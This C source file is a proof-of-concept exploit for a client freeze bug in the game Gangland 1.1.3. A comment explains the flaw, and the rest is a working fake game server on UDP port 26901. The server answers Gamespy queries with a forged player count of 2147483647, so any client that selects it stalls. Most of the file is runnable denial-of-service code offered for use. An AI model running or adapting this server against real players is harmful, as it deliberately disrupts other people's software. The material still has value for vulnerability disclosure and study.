/*

Gangland client click and freeze bug
by Luigi Auriemma


EXPLANATION
-----------
Gangland is a game released recently and uses the new Gamespy query
protocol (FE FD and so on).
When someone enters in the "join" multiplayer menu he will receive the
entire list of local and online game servers.

If a game server sends an information reply containing a big number of
current players, the client that will select that malicious server will
waste a lot of CPU and time to create the list of players in the screen
at bottom-left.

Practically the client replaces all the players not listed in the
packet but specified in the "numplayers" with a default name, so if the
value specified by the server is 10000000 the client will create
10000000 default players names and in the meantime it will result
completely freezed.

I repeat that the problem happens only when a user select (single click)
the malicious server that however is well visible because in the players
column is just written the number of current players (big number) and
that of maximum players.
This detail makes the bug a very low dangerous bug.

Tested versus the demo of the game Gangland 1.1.3

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define BUFFSZ  2048
#define PORT    26901
#define PING    "\x05\x00\x00\x00\x00\x00"
#define GAMEVER "1.1.3"
#define PLAYBUG "2147483647"    /* BUG HERE */



void std_err(void);



int main(int argc, char *argv[]) {
    int     sd,
            len,
            on = 1,
            psz;
    struct  sockaddr_in peer;
    u_char  *buff,
            *pck,
            pcklan[] =
                "\x00\x00\x00\x00\x00"
                "hostname\0"    "Click and freeze\0"
                "gamever\0"     GAMEVER"\0"
                "hostport\0"    "0\0"
                "mapname\0"     "Suburbs - North Area\0"
                "gametype\0"    "\0"
                "numplayers\0"  PLAYBUG"\0"
                "numteams\0"    "0\0"
                "maxplayers\0"  "2\0"
                "gamemode\0"    "\0"
                "teamplay\0"    "0\0"
                "gamever\0"     GAMEVER"\0"
                "password\0"    "0\0",
            pckinternet[] =
                "\x00\x00\x00\x00\x00"
                "Click and freeze\0"
                "0\0"
                "Suburbs - North Area\0"
                PLAYBUG"\0"
                "2\0"
                GAMEVER"\0";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Gangland client click and freeze bug "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n"
        "Note: the clients will be freezed only when they will select your server\n"
        "\n", stdout);

    peer.sin_addr.s_addr = INADDR_ANY;
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    printf("\nBinding UDP port %u\n", PORT);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd, (struct sockaddr *)&peer, psz)
      < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    fputs("\nClients:\n", stdout);
    while(1) {
        len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
        if(len < 0) std_err();

        if(buff[2]) {
            printf("PING       %s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
            if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, psz)
              < 0) std_err();
            continue;
        }

        if(len == 10) {
            fputs("LAN        ", stdout);
            pck = pcklan;
            len = sizeof(pcklan) - 1;
        } else {
            fputs("INTERNET   ", stdout);
            pck = pckinternet;
            len = sizeof(pckinternet) - 1;
        }

        printf("%s:%hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
        memcpy(pck, buff + 2, 5);

        if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, psz)
          < 0) std_err();
    }

    close(sd);
    return(0);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


